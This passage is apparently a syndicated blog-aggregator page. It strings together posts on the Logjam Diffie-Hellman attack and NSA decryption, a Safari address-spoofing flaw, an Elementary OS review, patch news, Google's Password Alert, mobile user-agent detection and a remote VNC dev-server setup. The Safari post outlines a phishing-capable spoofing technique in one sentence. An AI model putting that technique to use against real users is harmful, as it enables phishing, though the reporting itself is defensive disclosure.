We carried out this computation against the most common 512-bit prime used for TLS and demonstrate that the Logjam attack can be used to downgrade connections to 80% of TLS servers supporting DHE_EXPORT. We further estimate that an academic team can break a 768-bit prime and that a nation-state can break a 1024-bit prime. Breaking the single, most common 1024-bit prime used by web servers would allow passive eavesdropping on connections to 18% of the Top 1 Million HTTPS domains. A second prime would allow passive decryption of connections to 66% of VPN servers and 26% of SSH servers. A close reading of published NSA leaks shows that the agency’s attacks on VPNs are consistent with having achieved such a break.

Remember James Bamford’s 2012 comment about the NSA’s cryptanalytic capabilities:

According to another top official also involved with the program, the NSA made an enormous breakthrough several years ago in its ability to cryptanalyze, or break, unfathomably complex encryption systems employed by not only governments around the world but also many average computer users in the US. The upshot, according to this official: “Everybody’s a target; everybody with communication is a target.”


The breakthrough was enormous, says the former official, and soon afterward the agency pulled the shade down tight on the project, even within the intelligence community and Congress. “Only the chairman and vice chairman and the two staff directors of each intelligence committee were told about it,” he says. The reason? “They were thinking that this computing breakthrough was going to give them the ability to crack current public encryption.”

And remember Director of National Intelligence James Clapper’s introduction to the 2013 “Black Budget“:

Also, we are investing in groundbreaking cryptanalytic capabilities to defeat adversarial cryptography and exploit internet traffic.

It’s a reasonable guess that this is what both Bamford’s source and Clapper are talking about. It’s an attack that requires a lot of precomputation — just the sort of thing a national intelligence agency would go for.

But that requirement also speaks to its limitations. The NSA isn’t going to put this capability at collection points like Room 641A at AT&T’s San Francisco office: the precomputation table is too big, and the sensitivity of the capability is too high. More likely, an analyst identifies a target through some other means, and then looks for data by that target in databases like XKEYSCORE. Then he sends whatever ciphertext he finds to the Cryptanalysis and Exploitation Services (CES) group, which decrypts it if it can using this and other techniques.

Ross Anderson wrote about this earlier this month, almost certainly quoting Snowden:

As for crypto capabilities, a lot of stuff is decrypted automatically on ingest (e.g. using a “stolen cert”, presumably a private key obtained through hacking). Else the analyst sends the ciphertext to CES and they either decrypt it or say they can’t.

The analysts are instructed not to think about how this all works. This quote also applied to NSA employees:

Strict guidelines were laid down at the GCHQ complex in Cheltenham, Gloucestershire, on how to discuss projects relating to decryption. Analysts were instructed: “Do not ask about or speculate on sources or methods underpinning Bullrun.”

I remember the same instructions in documents I saw about the NSA’s CES.

Again, the NSA has put surveillance ahead of security. It never bothered to tell us that many of the “secure” encryption systems we were using were not secure. And we don’t know what other national intelligence agencies independently discovered and used this attack.

The good news is now that we know reusing prime numbers is a bad idea, we can stop doing it.

SANS Internet Storm Center, InfoCON: green: Address spoofing vulnerability in Safari Web Browser, (Mon, May 18th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

A new vulnerability arised in Safari Web Browser that can lead to an address spoofing allowing attackers to show any URL address while loading a different web page. While this proof of concept is not perfect, it could definitely be fixed to be used by phishing attacks very easily.

There is a proof of concept From an iPad Air 2 Safari Web Browser:

From same iPad using Google Chrome:

The code is very simple: webpage reloads every 10 milliseconds using the setInterval() function, just before the browser can get the real page and so the user sees the real” />

We are interested if you notice any phishing attacks using this vulnerability. If you see one, please let us know using our contact form.

Manuel Humberto Santander Pelez
SANS Internet Storm Center – Handler
Twitter: @manuelsantander
e-mail: msantand at isc dot sans dot org

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Linux How-Tos and Linux Tutorials: Elementary OS Freya: Is This The Next Big Linux Distro?

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jack Wallen. Original post: at Linux How-Tos and Linux Tutorials

Freya default desktop

I’ve tried just about every flavor of Linux available. Not a desktop interface has gone by that hasn’t, in some way, touched down before me. So when I set out to start kicking the tires of Elementary OS Freya, I assumed it was going to be just another take on the same old desktop metaphors. A variation of GNOME, a tweak of Xfce, a dash of OSX or some form of Windows, and the slightest hint of Chrome OS. What I wound up seeing didn’t disappoint on that level—it was a mixed bag of those very things. However, that mixed bag turned out to be something kind of special … something every Linux user should take notice of.

Why? Because Elementary OS Freya gets a lot of things right, including some things that other distributions have failed to bring to light. True user-friendliness.

Elementary OS Freya takes all of the known elements of a good UI, blends them together, and doesn’t toss in anything extraneous that might throw the user for a loop. The end result is a desktop interface that anyone (and I do mean anyone) can use without hiccup.

Before I dive any further into this, I must say that Freya is still in beta (and has been for quite some time). That being said, the beta release of Freya is rock solid. You can download the beta here and install it alongside your current OS or as a virtual guest in VirtualBox.

With that said, let’s examine what it is about Elementary OS Freya that makes it, quite possibly, the most ideal Linux desktop distribution (and maybe what it could use to draw it nearer to perfection).


This is where Freya truly nails just about every possible aspect of the desktop interface. Upon installation (or loading up the live image), you are greeted with a minimalist interface that, at first glance, looks like a take on GNOME Shell with an added dock for good measure (Figure 1).

You only need scratch the surface to find out that Freya has taken hints from nearly every major interface and rolled them into a coherent whole that will please everyone. Consider this:

  • OSX dock

  • Chrome OS menu

  • GNOME Shell panel

  • Multiple workspaces

  • OSX consistency in design

  • Ubuntu system settings

  • Ubuntu Software Center.

 Do you see where that is going? With those pieces working as a cohesive unit, the Freya desktop is already light years ahead of a number of platforms. And they do work together very well.

The foundation

Elementary OS did right by choosing Ubuntu as its foundation. With this, they receive the Ubuntu Software Center, which happens to be one of the most user-friendly package managers within the Linux ecosystem. This also adds the Ubuntu System Settings tool, which is quite simple to use (Figure 2).

Figure 2: The Elementary OS Freya System Settings tool.

Where Elementary OS Freya departs from Ubuntu (besides Unity) is the default applications. This also happens to be one area where Freya does stumble a bit. By this, I mean the default web browser. I get the desire to use Midori over the likes of Chrome or Firefox; but the reality is that choice limits the platform in a number of ways (think supported sites). For someone like me, who depends upon Google Drive, Midori simply does not work. When I try to access Google Drive, I receive the warning You are using an unsupported browser.

To get around this, I must install either Chrome or Firefox. Not a problem, of course. All I need to do is hop on over to the Software Center and install Firefox. If I want Chrome, I head over to the Chrome download location and download the installable .deb file. If you install either Chrome or Firefox, surprisingly enough, the design scheme holds true for both.

NOTE: If you want to install Chrome on the current Freya beta, I highly recommend against doing so. Every attempt to load the Chrome download page (through either Midori or Firefox) actually crashes the Freya desktop to the point where a hard restart is necessary. So install Firefox through the Software Center and then download Chrome with Firefox. I did, however, manage to download the .deb file for Chrome on one machine, transfer it (via USB), and then install Chrome on Elementary OS. Once this was done, the Chrome Download page loaded fine (from Chrome only) and Google Drive worked flawlessly.

Missing apps

Outside of a supported browser, the one area that Elementary OS needs a bit of attention is the application selection. Upon installation, you will find no sign of an office suite or graphics tool. In fact, the closest thing to a word processor is the Scratch text editor. There is no LibreOffice to be found (and with the state of Midori rendering Google Drive useless, this is an issue).

Yes, you can hop over to the Software Center and install LibreOffice, but we’re looking at a Linux desktop variant that offers one of the most well designed interfaces for new users. Why make those users jump through hoops to have what nearly every flavor of Linux installs by default? On top of that, when installing LibreOffice through the Software Center (on Elementary OS), you wind up with a very out of date iteration of the software ( ─ which completely shatters the aesthetics of the platform (Figure 3).

Figure 3: An out-of-date version of LibreOffice breaks the global theme.

Including LibreOffice (and an up-to-date version at that) would take next to nothing. The latest iteration of Ubuntu (15.04) includes LibreOffice 4.4. This release of the flagship open source office suite would be much better suited for Elementary OS Freya … on every level. I highly recommend downloading the main LibreOffice installer and installing with the following steps:

  1. Open a terminal window.

  2. Change into the Downloads folder (assuming you downloaded the file there) with the command cd Downloads.

  3. Unpack the file with the command tar xvzf LibreOffice_XXX.tar.gz (Where XXX is the release number).

  4. Change into the DEBS subfolder of the newly created directory.

  5. Issue the command sudo dpkg -i *deb

Once the installation is complete, you’ll need to run the new install from the command line (since the entries for LibreOffice in the Applications menu will still be the old 4.2 release). The command to run the new version of LibreOffice is libreoffice4.4. Once opened, you can lock the launcher to the dock by right-clicking the LibreOffice icon in the dock and selecting Keep in Dock.

There is so much to love about Elementary OS Freya. Considering this platform is still in beta makes it all the more impressive. Even though there are areas that could use a bit of polish, what we are looking at could easily take over as the single most user-friendly and well designed Linux distribution to date.

Have you given Elementary OS Freya a try? If so, what was your impression? Will you be ready to hop from your current distribution to this new flavor, once it is out of beta? If not, what keeps you from jumping ship?  

Krebs on Security: Adobe, Microsoft Push Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Microsoft today issued 13 patch bundles to fix roughly four dozen security vulnerabilities in Windows and associated software. Separately, Adobe pushed updates to fix a slew of critical flaws in its Flash Player and Adobe Air software, as well as patches to fix holes in Adobe Reader and Acrobat.

brokenwindowsThree of the Microsoft patches earned the company’s most dire “critical” rating, meaning they fix flaws that can be exploited to break into vulnerable systems with little or no interaction on the part of the user. The critical patches plug at least 30 separate flaws. The majority of those are included in a cumulative update for Internet Explorer. Other critical fixes address problems with the Windows OS, .NET, Microsoft Office, and Silverlight, among other components.

According to security vendor Shavlik, the issues address in MS15-044 deserve special priority in patching, in part because it impacts so many different Microsoft programs but also because the vulnerabilities fixed in the patch can be exploited merely by viewing specially crafted content in a Web page or a document. More information on and links to today’s individual updates can be found here.

Adobe’s fix for Flash Player and AIR fix at least 18 security holes in the programs. Updates are available for Windows, OS X and Linux versions of the software. Mac and Windows users, the latest, patched version is v. 

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to the latest version. To force the installation of an available update, click the triple bar icon to the right of the address bar, select “About Google” Chrome, click the apply update button and restart the browser.


The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.).

If you run Adobe Reader, Acrobat or AIR, you’ll need to update those programs as well. Adobe said it is not aware of any active exploits or attacks against any of the vulnerabilities it patched with today’s releases.

Schneier on Security: Protecting Against Google Phishing in Chrome

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Google has a new Chrome extension called “Password Alert”:

To help keep your account safe, today we’re launching Password Alert, a free, open-source Chrome extension that protects your Google and Google Apps for Work Accounts. Once you’ve installed it, Password Alert will show you a warning if you type your Google password into a site that isn’t a Google sign-in page. This protects you from phishing attacks and also encourages you to use different passwords for different sites, a security best practice.

Here’s how it works for consumer accounts. Once you’ve installed and initialized Password Alert, Chrome will remember a “scrambled” version of your Google Account password. It only remembers this information for security purposes and doesn’t share it with anyone. If you type your password into a site that isn’t a Google sign-in page, Password Alert will show you a notice like the one below. This alert will tell you that you’re at risk of being phished so you can update your password and protect yourself.

It’s a clever idea. Of course it’s not perfect, and doesn’t completely solve the problem. But it’s an easy security improvement, and one that should be generalized to non-Google sites. (Although it’s not uncommon for the security of many passwords to be tied to the security of the e-mail account.) It reminds me somewhat of cert pinning; in both cases, the browser uses independent information to verify what the network is telling it.

Slashdot thread.

Toool's Blackbag: Euro-Locks

This post was syndicated from: Toool's Blackbag and was written by: Walter. Original post: at Toool's Blackbag

April 24th, a delegation of Toool visited the Euro-Locks factory in Bastogne, Belgium.

Sales manager Jean-Louis Vincart welcomed us and talked us through the history of Euro-Locks, the factories and products. After that, we visited the actual production facility. The Bastogne factory is huge and almost all of their products are completely build here. We spoke with the R&D people creating new molds, saw molten zamac, steel presses, chrome baths, assembly lines and packaging, so everything from the raw metal to the finished product. It’s interesting to see so many products (both in range of products and the actual number of produced locks) being made here, and having no stock of the finished product.

Thanks to Eric and Martin for making the visit possible.

The Hacker Factor Blog: Great Googly Moogly!

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

Google recently made another change to their pagerank algorithm. This time, they are ranking results based on the type of device querying it. What this means: a Google search from a desktop computer will return different results compared to the same search from a mobile device. If a web page is better formatted for a mobile device, then it will have a higher search result rank for searches made from mobile devices.

I understand Google’s desire to have web pages that look good on both desktop and mobile devices. However, shouldn’t the content, authoritativeness, and search topic be more important than whether the page looks pretty on a mobile device?

As a test, I searched Google for “is this picture fake”. The search results on my desktop computer was different than the results from my Android phone. In particular, the 2nd desktop result was completely gone on the mobile device, the FotoForensics FAQ was pushed down on the mobile device, TinEye was moved up on the mobile device, and other analysis services were completely removed from the mobile results.

In my non-algorithmic personal opinion, I think the desktop results returned more authoritative results and better matched the search query than the mobile device results.

Google’s Preference

Google announced that they were doing this change on February 26. They gave developers less than two months notice of this change.

While two months may be plenty of time for small developers to change their site layout, I suspect that most small developers never heard about this change. For larger organization, two months is barely enough time to have a meeting about having a meeting about scheduling a meeting to discuss a site redesign for mobile devices.

In other words: Google barely gave anyone notice, and did not give most sites time to act. This is synonymous with those security researchers who report vulnerabilities to vendors and then set arbitrarily short deadlines before going public. Short deadlines are not about doing the right thing; it’s about pushing an agenda.

Tools for the trade

On the plus side, Google provided a nice web tool for evaluating web sites. This allows site designers to see how their web pages look on a mobile device. (At least, how it will look according to Google.)

Google also provides a mobile guide that describes what Google thinks a good web page layout looks like. For example, you should use large fonts and only one column in the layout. Google also gives suggestions like using dynamic layout web pages (detect the screen and rearrange accordingly) and using separate servers (www.domain and m.domain): one for desktop users and one for mobile devices.

Google’s documentation emphasizes that this is really for smartphone users. They state that by “mobile devices“, they are only talking about smartphones and not tablets, feature phones, and other devices. (I always thought that a mobile device was anything you could use while being mobile…)

Little Time, Little Effort

One of my big irks about Google is that Google’s employees seem to forget that not every company is as big as Google or has as many resources as Google. Not everyone is Google. By giving developers very little time to make changes that better match Google’s preferred design, it just emphasizes how out of touch Google’s developers are with the rest of the world. The requirements decreed in their development guidelines also show an unrealistic view of the world. For example:

  • Google recommends using dynamic web pages for more flexibility. It also means much more testing and requires a larger testing environment. Testing is usually where someone notices that the site lacks usability.

    Google+ has a flexible interface — the number of columns varies based on the width of the browser window. But Google+ also has a horrible multi-column layout that cannot be disabled. And LinkedIn moved most of their billions of options into popups — now you cannot click on anything without it being covered by a popup window first.

    For my own sites, I do try to test with different browsers. Even if I think my site looks great on every mobile device I tested, that does not mean that it will look great on every mobile device. (I cannot test on everything.)

    Providing the same content to every device minimizes the development and testing efforts. It also simplifies the usability options.

  • Google suggests the option of maintaining two URLs or two separate site layouts — one for desktops and one for mobile devices. They overlook that this means twice the development effort, which translates into twice the development costs.
  • Maintaining two URLs also means double the amount of bot traffic indexing the site, double the load on the server, and double the network bandwidth. Right now, about 75% of the traffic to my site comes from bots indexing and mirroring (and attacking) my site. If I maintained two URLs to the same content with different formatting, I would be dividing the visitor load between the two sites (half go mobile and half go desktop), while doubling the bot traffic.
  • Google’s recommendations normalize the site layout. Everyone should use large text. Everyone should use one column for mobile displays, etc.

    Normalizing web site layouts goes against the purpose of HTML and basic web site design. Your web site should look the way that you want it to look. If you want small text, then you can use small text. If you want a wide layout, then you can use a wide layout. Every web site can look different. Just be aware that Google’s pagerank system now penalizes you for looking different and for expressing creativity.

  • Google’s online test for mobile devices does not take into account whether the device is held vertically or horizontally. My Android phone rotates the screen and makes the text larger when I hold it horizontally. According to Google, all mobile pages should be designed for a vertical screen.

Ironically, there has been a lot of effort by mobile web browser developers (not the web site, but the actual browser developers) to mitigate display issues in the browser. One tap zooms into the text and reflows it to fit the screen, another tap zooms out and reflows it again. And rotating the screen makes the browser display wider instead of taller. Google’s demand to normalize the layout really just means that Google has zero confidence in the mobile browser developers and a limited view on how users use mobile devices.

Moving targets

There’s one significant technical issue that is barely addressed by Google’s Mobile Developer Guide: how does a web site detect a mobile device?

According to Google, your code should look at the user-agent field for “Android” and “Mobile”. That may work well with newer Android smartphones, but it won’t help older devices or smartphones that don’t use those keywords. Also, there are plenty of non-smartphone devices that use these words. For example, Apple’s iPad tablet has a user-agent string that says “Mobile” in it.

In fact, there is no single HTTP header that says “Hi! I’m a mobile device! Give me mobile content!” There’s a standard header for specifying supported document formats. There’s a standard header for specifying preferred language. But there is no standard for identifying a mobile device.

There is a great write-up called “How to Detect Mobile Devices“. It lists a bunch of different methods and the trade-offs between each.

For example, you can try to use JavaScript to render the page. This is good for most smartphones, but many feature-phones lack JavaScript support. The question also becomes: what should you detect? Screen size may be a good option, but otherwise there is no standard. This approach can also be problematic for indexing bots since it requires rendering JavaScript to see the layout. (Running JavaScript in a bot becomes a halting problem since the bot cannot predict when the code will finish rendering the page.)

Alternately, you can try to use custom style sheets. There’s a style sheet extension “@media” for specifying a different layout for mobile devices. Unfortunately, many mobile devices don’t support this extension. (Oh the irony!)

Usually people try to detect the mobile device on the server side. Every web browser sends a user-agent string that describes the browser and basic capabilities. For example:

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.3) Gecko/20150308 Firefox/31.9 PaleMoon/25.3.0

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4

Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-T530NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36

Opera/9.80 (Android; Opera Mini/7.6.40234/36.1701; U; en) Presto/2.12.423 Version/12.16

The first sample user-agent string identifies the Pale Moon web browser (PaleMoon 25.3.0) on a 64-bit Windows 7 system (Windows NT 6.1; Win64). It says that it is compatible with Firefox 31 (Firefox/31.9) and supports the Gecko toolkit extension (Gecko/20150308). This is likely a desktop system.

The second sample identifies Mobile Safari 8.0 on an iPhone running iOS 8.1.2. This is a mobile device — because I known iPhones are mobile devices, and not because it says “Mobile”.

The third sample identifies the Android browser 1.5 on a Samsung SM-T530NU device running Android 4.4 (KitKat) and configured for English from the United States. It doesn’t say what it is, but I can look it up and determine that the SM-T530NU is a tablet.

The fourth and final example identifies Opera Mini, which is Opera for mobile devices. Other than looking up the browser type, nothing in the user-agent string tells me it is a mobile device.

The typical solution is to have the web site check the user-agent string for known parts. If it sees “Mobile” or “iPhone” then we can assume it is some kind of mobile device — but not necessarily a smartphone. The web site Detect Mobile Browsers offers code snippets for detecting mobile devices. Google’s documentation says to look for ‘Android’ and ‘Mobile’. Here’s the PHP code that Detect Mobile Browsers suggest using:

if (preg_match(‘/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i’,$useragent)||preg_match(‘/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i’,substr($useragent,0,4))) { then… }

This is more than just detecting ‘Android’ and ‘Mobile’. If the user-agent string says Android or Meego or Mobile or Avantgo or Blackberry or Blazer or KDDI or Opera (with mini or mobi or mobile)… then it is probably a mobile device.

Of course, there are two big problems with this code. First, it has so many conditions that it is likely to have multiple false-positives (e.g., detecting a tablet or even a desktop as a mobile phone). In fact, we can see this this problem since the regular expression contains “kindle” — the Amazon Kindle is a tablet and not a smartphone. (And the Kindle user-agent string also includes the word ‘Android’ and may include the word ‘Mobile’.)

Second, this long chunk of code is a regular expression — a language describing a pattern to match. All regular expressions are slow to evaluate and more complicated expressions take more time. Unless you have unlimited resources (like Google) or have low web volume, then you probably do not want to run this code on every web page request.

If Google really wants to have every web site provide mobile-specific content, then perhaps they should push through a standard HTTP header for declaring a mobile device, tablet, and other types of devices. Right now, Google is forcing web sites to redesign for devices that they may not be able to detect.

(Of course, none of this handles the case where an anonymizer changes the user-agent setting, or where users change the user-agent value in their browser.)

Low Ranking Advice

Some of Google’s mobile site suggestions are good, but not limited to mobile devices. Enabling server compression and designing pages for fast loading benefit both desktop and mobile browsers.

I actually think that there may be a hidden motivation behind Google’s desire to force web site redesigns… The recommended layout — with large primary text, viewport window, and single column layout — is probably easier for Google to parse and index. In other words, Google wants every site to look the same so it will be easier for Google to index the content.

And then there is the entire anti-competitive edge. Google’s suggestion for detecting mobile devices (look for ‘Android’) excludes non-android devices like Apple’s iPhone. Looking for ‘Mobile’ misclassifies Apple’s iPad, potentially leading to a lesser user experience on Apple products. And Google wants you to make site changes so that your web pages work better with Googlebot. This effectively turns all web sites into Google-specific web sites.

Promoting aesthetics over content seems to go against the purpose of a search engine; users search for content and not styling. Normalizing content layout contracts the purpose of having configurable layouts. Giving developers less than two months to make major changes seems out of touch with reality. And requiring design choices that favor the dominant company’s strict views seems very anti-competitive to me.

Many web sites depend on search engines like Google for income — either directly through ads or indirectly through visibility. This recent change at Google will dramatically impact many web sites — sites with solid content but, according to Google, less desirable layouts. Moreover, it forces companies to comply with Google’s requirements or lose future revenue.

Google has a long history of questionable behavior. This includes multiple lawsuits against Google for anti-competitive behavior and privacy violations. However, each of these cases are debatable. In contrast, I think that this requirement for site layout compliance is the first time that the “do no evil” company has explicitly gone evil in a non-debatable way.

Linux How-Tos and Linux Tutorials: How to Configure Your Dev Machine to Work From Anywhere (Part 3)

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Jeff Cogswell. Original post: at Linux How-Tos and Linux Tutorials

In the previous articles, I talked about my mobile setup and how I’m able to continue working on the go. In this final installment, I’ll talk about how to install and configure the software I’m using. Most of what I’m talking about here is on the server side, because the Android and iPhone apps are pretty straightforward to configure.

Before we begin, however, I want to mention that this setup I’ve been describing really isn’t for production machines. This should only be limited to development and test machines. Also, there are many different ways to work remotely, and this is only one possibility. In general, you really can’t beat a good command-line tool and SSH access. But in some cases, that didn’t really work for me. I needed more; I needed a full Chrome JavaScript debugger, and I needed better word processing than was available on my Android tablets.

Here, then, is how I configured the software. Note, however, that I’m not writing this as a complete tutorial, simply because that would take too much space. Instead, I’m providing overviews, and assuming you know the basics and can google to find the details. We’ll take this step by step.

Spin up your server

First, we spin up the server on a host. There are several hosting companies; I’ve used Amazon Web Services, Rackspace, and DigitalOcean. My own personal preference for the operating system is Ubuntu Linux with LXDE. LXDE is a full desktop environment that includes the OpenBox window manager. I personally like OpenBox because of its simplicity while maintaining visual appeal. And LXDE is nice because, as its name suggests (Lightweight X11 Desktop Environment), it’s lightweight. However, many different environments and window managers will work. (I tried a couple tiling window managers such as i3, and those worked pretty well too.)

The usual order of installation goes like this: You use the hosting company’s website to spin up the server, and you provide a key file that will be used for logging into the server. You can usually use your own key that you generate, or have the service generate a key for you, in which case you download the key and save it. Typically when you provide a key, the server will automatically be configured to log in only using SSH with the key file. However, if not, you’ll want to follow disable password logins.

Connect to the server

The next step is to actually log into the server through an SSH command line and first set up a user for yourself that isn’t root, and then set up the desktop environment. You can log in from your desktop Linux, but if you like, this is a good chance to try out logging in from an Android or iOS tablet. I use JuiceSSH; a lot of people like ConnectBot. And there are others. But whichever you get, make sure it allows you to log in using a key file. (Key files can be created with or without a password. Also make sure the app you use allows you to use whichever key file type you created–password or no password.)

Copy your key file to your tablet. The best way is to connect the tablet to your computer, and transfer the file. However, if you want a quick and easy way to do it, you can email it. But be aware that you’re sending the private key file through an email system that other people could potentially access. It’s your call whether you want to do that. Either way, get the file installed on the tablet, and then configure the SSH app to log in using the key file, using the app’s instructions.

Then using the app, connect to your server. You’ll need the username, even though you’re using a key file (the server needs to know who you’re logging in as with the key file, after all); AWS typically uses “ubuntu” for the username for Ubuntu installations; others simply give you the root user. For AWS, to do the installation you’ll need to type sudo before each command since you’re not logged in as root, but won’t be asked for a password when running sudo. On other cloud hosts you can run the commands without sudo since you’re logged in as root.

Oh and by the way, because we don’t yet have a desktop environment, you’ll be typing commands to install the software. If you’re not familiar with the package installation tools, now is a chance to learn about them. For Debian-based systems (including Ubuntu), you’ll use apt-get. Other systems use yum, which is a command-line interface to the RPM package manager.

Install LXDE

From the command-line, it’s time to set up LXDE, or whichever desktop you prefer. One thing to bear in mind is that while you can run something big like Cinnamon, ask yourself if you really need it. Cinnamon is big and cumbersome. I use it on my desktop, but not on my hosted servers, opting instead for more lightweight desktops like LXDE. And if you’re familiar with desktops such as Cinnamon, LXDE will feel very similar.

There are lots of instructions online for installing LXDE or other desktops, and so I won’t reiterate the details here. DigitalOcean has a fantastic blog with instructions for installing a similar desktop, XFCE.

Install a VNC server

Then you need to install a VNC server. Instead of using TightVNC, which a lot of people suggest, I recommend vnc4server because it allows for easy resolution changes, as I’ll describe shortly.

While setting up the VNC server, you’ll create a VNC username. You can just use a username and password for VNC, and from there you’re able to connect from a VNC client app to the system. However, the connection won’t be secure. Instead, you’ll want to connect through what’s called an SSH tunnel. The SSH tunnel is basically an SSH session into the server that is used for passing connections that would otherwise go directly over the internet.

When you connect to a server over the Internet, you use a protocol and a port. VNC usually uses 5900 or 5901 for the port. But with an SSH tunnel, the SSH app listens on a port on the same local device, such as 5900 or 5901. Then the VNC app, instead of connecting to the remote server, connects locally to the SSH app. The SSH app, in turn, passes all the data on to the remote system. So the SSH serves as a go-between. But because it’s SSH, all the data is secure.

So the key is setting up a tunnel on your tablet. Some VNC apps can create the tunnel; others can’t and you need to use a separate app. JuiceSSH can create a tunnel, which you can use from other apps. My preferred VNC app, Remotix, on the other hand, can do the tunnel itself for you. It’s your choice how you do it, but you’ll want to set it up.

The app will have instructions for the tunnel. In the case of JuiceSSH, you specify the server you’re connecting to and the port, such as 5900 or 5901. Then you also specify the local port number the tunnel will be listening on. You can use any available port, but I’ll usually use the same port as the remote one. If I’m connecting to 5901 on the remote, I’ll have JuiceSSH also listen on 5901. That makes it easier to keep straight. Then you’ll open up your VNC app, and instead of connecting to a remote server, you connect to the port on the same tablet. For the server you just use, which is the IP address of the device itself. So to re-iterate:

  1. JuiceSSH connects, for example, to 5901 on the remote host. Meanwhile, it opens up 5901 on the local device.
  2. The VNC app connects to 5901 on the local device. It doesn’t need to know anything about what remote server it’s connecting to.

But some VNC apps don’t need another app to do the tunneling, and instead provide the tunnel themselves. Remotix can do this; if you set up your app to do so, make sure you understand that you’re still tunneling. You provide the information needed for the SSH tunnel, including the key file and username. Then Remotix does the rest for you.

Once you get the VNC app going, you’ll be in. You should see a desktop open with the LXDE logo in the background. Next, you’ll want to go ahead and configure the VNC client to your liking; I prefer to control the mouse using drags that simulate a trackpad; other people like to control the mouse by tapping exactly where you want to click. Remotix and several other apps let you choose either configuration.

Configuring the Desktop

Now let’s configure the desktop. One issue I had was getting the desktop to look good on my 10-inch tablet. This involved configuring the look and feel by clicking the taskbar menu < Preferences < Customize Look and Feel (or run from the command line lxappearance).


I also used OpenBox’s own configuration tool by clicking the taskbar menu < Preferences < OpenBox Configuration Manager (or runobconf).


My larger tablet’s screen isn’t huge at 10 inches, so I configured the menu bars and buttons and such to be somewhat large for a comfortable view. One issue is the tablet has such a high resolution that if I used the maximum resolution, everything was tiny. As such, I needed to be able to change resolutions based on the work I was doing, as well as based on which tablet I was using. This involved configuring the VNC server, though, not LXDE and OpenBox. So let’s look at that.

In order to change resolution on the fly, you need a program that can manage the RandR extensions, such as xrandr. But the TightVNC server that seems popular doesn’t work with RandR. Instead, I found the vvnc4server program works with xrandr, which is why I recommend using it instead. When you configure vnc4server, you’ll want to provide the different resolutions in the command’s -geometry option. Here’s an init.d service configuration file that does just that. (I modified this based on one I found on DigitalOcean’s blog.)

export USER="jeff"
